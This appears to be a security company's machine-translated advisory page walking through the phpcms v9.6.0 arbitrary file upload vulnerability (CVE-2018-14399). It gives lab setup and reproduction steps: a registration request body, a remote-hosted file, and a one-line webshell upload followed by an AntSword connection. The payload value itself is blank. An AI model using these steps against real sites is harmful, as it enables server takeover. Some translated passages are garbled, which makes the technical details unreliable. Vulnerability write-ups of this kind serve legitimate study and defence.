Cloud Security - News Center - phpcms v9.6.0 Arbitrary File Upload Vulnerability (CVE-2018-14399)-百老汇app

phpcms v9.6.0 Arbitrary File Upload Vulnerability (CVE-2018-14399)

2022-04-28Clicks: 7948

1. Vulnerability description

PHPCMS 9.6.libs/classes/attachment in version 0.class.There is a vulnerability in the php file, which is caused by the PHPCMS program not checking the file type properly when downloading remote/local files。A remote attacker could exploit the vulnerability to upload and execute arbitrary PHP code。

The vulnerability affects the version

PHPCMS 9.6.0

Third, vulnerability environment construction

1. Official download phpcms v9.6.Version 0, download address: http://download.phpcms.cn/v9/9.6/

2. Unzip the downloaded file, then put the file into the phpstudy site root directory, browser to go to 192.168.10.171/phpcms/install/install.php, start the installation

3. After the installation is complete, log in to the background and generate the home page

Fourth, the vulnerability is repeated

1.Browser to the front desk to register a member

2.Click on the registration page and grab the package

3.On another system (kali), open the web service, and then create a txt file in the web root directory and write the following information

4.Construct POC, upload a word Trojan

siteid=1&modelid=11&username=test2&password=test2123&email=test2@163.com&info[content]= &dosubmit=1&protocol=

Modify the packet and add the POC. Note that when testing go in the repeater, the username, password, and email field values are changed each time to ensure that they cannot be repeated。

5.Modified the captured packet content and added the POC

6.You can see that the content of the returned package contains the path of the uploaded file

7.Ant-sword connection

Previous: Spring-security RegexRequestMatcher Authentication Bypass Vulnerability Analysis (CVE-2022-22978)

Next: None

Industrial control safety

Offensive and defensive security

Safe operation

Education and training

Into the sky

400-666-3110

(Monday to Friday: 08:30-17:30)

Email: yuntian@4mdistribution.com

Address: Building 1, Phase 3, Century City, Zhonggrun

Yuntian security subscription number

Cloud Sky Security Service number

首页

Industrial control safety

Introduction to industrial control safety

Cloud series products

Net series products

End series product

Inspection series

Industrial Control Safety Information Center

New service of industrial control safety

Offensive and defensive security

Data security

Operation and maintenance + Security

Safe operation

Introduction to safe operation

Product series

solution

Security service

Safe community

Education and training

Industry program

Into the sky

phpcms v9.6.0 Arbitrary File Upload Vulnerability (CVE-2018-14399)

2022-04-28Clicks: 7948

Previous: Spring-security RegexRequestMatcher Authentication Bypass Vulnerability Analysis (CVE-2022-22978)

Next: None

Industrial control safety

Offensive and defensive security

Data security

Safe operation

Education and training

Industry program

Into the sky

400-666-3110

(Monday to Friday: 08:30-17:30)

Email: yuntian@4mdistribution.com

Address: Building 1, Phase 3, Century City, Zhonggrun

Yuntian security subscription number Cloud Sky Security Service number

Shandong Yuntian Safety Technology Co., LTD. All rights reserved Lu ICP No. 17007379-1

Lu public network Anbei 37010202002190